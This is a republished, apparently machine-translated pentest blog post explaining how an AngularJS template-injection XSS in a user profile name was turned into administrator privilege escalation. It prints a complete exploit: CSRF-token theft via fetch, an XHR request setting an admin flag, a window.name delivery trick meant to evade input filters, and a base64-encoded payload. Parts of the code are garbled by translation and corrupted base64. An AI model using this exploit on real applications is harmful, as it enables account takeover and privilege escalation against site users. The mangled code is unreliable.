Shulou(Shulou.com)05/31 Report--

This article will explain in detail how to use XSS to raise rights based on AngularJS. The content of the article is of high quality, so the editor shares it for you as a reference. I hope you will have some understanding of the relevant knowledge after reading this article.

XSS is a very interesting vulnerability, and after discovering it, you can communicate directly with the application without worrying about the same origin policy. Everything is under our control, and most of the protection has been broken.

The administrator user has the highest privileges for the application to add / remove / edit any user. And it was through XSS that I was finally promoted to administrator privileges. Whenever I find XSS, I try to use some unique ways to take advantage of them. Token grabbing, CSRF protection bypassing or grabbing cookie, now seems a bit out of date.

During my testing, I found several XSS vulnerabilities on the user profile page. Each registered user has a different profile page, such as "https://www.site.com/users/username-here"."

Discover AngularJS-based XSS:

This is a page that all privileged users can access that contains the user's account name and last name. Apply simple test probes, such as ">

No results are displayed, so this indicates that the application has been properly protected by XSS. All the special characters are filtered correctly, which leads me to another thought: why not try to get AngularJS-based XSS? Go to "settings" and change the account name to "{{alert (1)}".

So I tested the same content as a different privileged user and navigated to my profile / users/username_page (accessible to any user) to trigger payload.

When trying to elevate permissions, your main goal is to find features that can edit your role or invite you into unrestricted areas. In my example, the administrator user has the right to edit / add the user.

In my example, I have a test administrator account to test these problems, so I know what requests need to be replicated to add a new administrator privileged user. Without access, you just try to get the source code of the administrative account by sending the output of document.body [XSS _ clean] and try to get information about the internal functions. You can use XSSHunter and other tools to get this kind of information.

How to provide payload?

In any case, the length limit of the username field is so short that the entire exploit code cannot be written in this field. The user name also adds an entry to the profile page, and it also appears as malicious content. Also limited by length, script tags that reference external JavaScript cannot be injected.

As usual, I provide payload through window.name. I always provide payload through window.name because it has no exploitation restrictions, and the payload that loads our exploit code is limited to 20 characters, because we will only load the given payload and provide it to eval (atob (top.name)). Another benefit of using this technique is that you can bypass validation checks that bypass many malicious keywords Because our main exploit code will not be entered into vulnerable applications. So in short, our attack code will not be verified and checked.

Therefore, window name can be set by opening a URL using window.open (url, "window name here"), and we set the exploit code to base64. So, by calling window.name, it will return our vulnerability code, which will be executed by eval ()

Locate the user modification function:

This feature is found in the administrative user portal, and the most privileged user can arbitrarily change the data and permissions of the user in the application. There are different options, such as e-mail changes and check boxes, to confirm that the user has higher permissions. By setting the parameter "csc=1", the user will be granted full permission, but this operation can only be performed by the administrator user. If you only retrieve the source code, you can perform a source code review to see which endpoints take which parameters to map all functions.

The following is the request to change the user to an administrator and a fully privileged user:

POST / users/attackers-username HTTP/1.1Host: vulnerablesite.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0Accept: application/json, text/plain, * / * Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 141_method=PUT&_token=CSRF_TOKEN_HERE&name=USERNAME&email=USER_EMAIL&phone=&csc=1

In order to enhance our privileges, we should reproduce the above request so that when higher-privileged users access our exploit code, our users will be modified.

Write exploit code:

The first thing we need to retrieve is the CSRF token so that we can validate the request. Sometimes it appears in cookie, so it's easy to retrieve it from [xss_clean], but in this case, it's found in a meta tag:

I use fetch () to open the settings page at / settings and store its output in the variable woot. Then I use woot.getElementsByTagName ('meta') [3] [' content'] to retrieve the value of the CSRF token and store it in the new variable csrf_token. Now our exploit code is as follows:

Var woot = document.createElement ('html'); fetch (' https://vulnerablesite.com/settings',{credentials: 'include'}). Then ((resp) = > resp.text ()). Then (function (data) {wood [XSS _ clean] = data;var csrf_token = woot.getElementsByTagName (' meta') [3] ['content'].

Now we will use XHR to reproduce the request:

Function privilege_escalate () {var req = new XMLHttpRequest (); req.open ('POST',' https://vulnerablesite.com/users/mrs-camylle-kertzmazevalwindowname',true);req.withCredentials = true;req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded"); req.send (' _ method=PUT&_token='+csrf_token+'&name=Mrs.+Camylle+Kertzmaz%7B%7Beval%28window.name%29%7D%7D&email=user%40example.org&phone=&csc=1');}

The above privilege_escalate () function, when executed, sends a POST request that changes the information of the attacker account (in my case, mrs-camylle-kertzmazevalwindowname) and changes the name to payload {{eval (atob (window.name))}}, which preserves the name, so when window.name has exploit code, it will be used to execute exploit code from window.name. In addition, the requested csc=1 will change the user's permissions.

The final exploit code: / / XSS Exploit code for Privilege Escalation// Author: Shawar Khanvar woot = document.createElement ('html'); fetch (' https://vulnerablesite.com/settings',{credentials: 'include'}). Then ((resp) = > resp.text ()). Then (function (data) {wood [XSS _ clean] = data;var csrf_token = woot.getElementsByTagName (' meta') [3] ['content']; privilege_escalate (); function privilege_escalate () {var req = new XMLHttpRequest () Req.open ('POST',' https://vulnerablesite.com/users/mrs-camylle-kertzmazevalwindowname',true);req.withCredentials = true;req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded"); req.send (' _ method=PUT&_token='+csrf_token+'&name=Mrs.+Camylle+Kertzmaz%7B%7Beval%28window.name%29%7D%7D&email=user%40example.org&phone=&csc=1');}})

The exploit code can be further base64 encoded and used as a window name, so it will be triggered when eval (atob (window.name)) executes the code. We can now use the following code to open our profile page and set our exploit code to window name. In this way, once window.name is accessed, our exploit code will be triggered:

Window.open ('https://vulnerablesite.com/users/mrs-camylle-kertzmazevalwindowname','dmFyIHdvb3QgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdodG1sJyk7CmZldGNoKCdodHRwczovL3Z1bG5lcmFibGVzaXRlLmNvbS9zZXR0aW5ncycse2NyZWRlbnRpYWxzOiAnaW5jbHVkZSd9KS50aGVuKChyZXNwKSA9PiByZXNwLnRleHQoKSkudGhlbihmdW5jdGlvbihkYXRhKXsKCndvb3QuaW5uZXJIVE1MPWRhdGE7CnZhciBjc3JmX3Rva2VuID0gd29vdC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnbWV0YScpWzNdWydjb250ZW50J107CnByaXZpbGVnZV9lc2NhbGF0ZSgpOwoKZnVuY3Rpb24gcHJpdmlsZWdlX2VzY2FsYXRlKCl7CnZhciByZXEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTsKcmVxL**wZW4oJ1BPU1QnLCdodHRwczovL3Z1bG5lcmFibGVzaXRlLmNvbS91c2Vycy9tcnMtY2FteWxsZS1rZXJ0em1hemV2YWx3aW5kb3duYW1lJyx0cnVlKTsKcmVxLndpdGhDcmVkZW50aWFscyA9IHRydWU7CnJlcS5zZXRSZXF1ZXN0SGVhZGVyKCJDb250ZW50LVR5cGUiLCAiYXBwbGljYXRpb24veC13d3ctZ**ybS11cmxlbmNvZGVkIik7IApyZXEuc2VuZCgnX21ldGhvZD1QVVQmX3Rva2VuPScrY3NyZl90b2tlbisnJm5hbWU9TXJzLitDYW15bGxlK0tlcnR6bWF6JTdCJTdCZXZhbCUyOHdpbmRvdy5uYW1lJTI5JTdEJTdEJmVtYWlsPXVzZXIlNDBleGFtcGxlL**yZyZwaG9uZT0mY3NjPTEnKTsKfQoKfQop')

In the screenshot below, we can see that the functions that our users can access are limited:

After the highly privileged user successfully executed the exploit code, our account had the highest privileges and access to administrative functions. As shown in the following figure:

Whenever you test for XSS vulnerabilities, don't give up because the application correctly filters user input. You should further try to use other technologies to achieve effective use of XSS. For example, XSS mentioned in this article. Try to use {{alert (1}}) or try to upload .swf, .svg, .html, .url, etc.

Never dwell on vulnerability detection, always try to understand its limitations and scope. When faced with XSS, try to interact with unique features, not just a pop-up window.

On the basis of AngularJS how to use XSS to achieve rights sharing here, I hope that the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.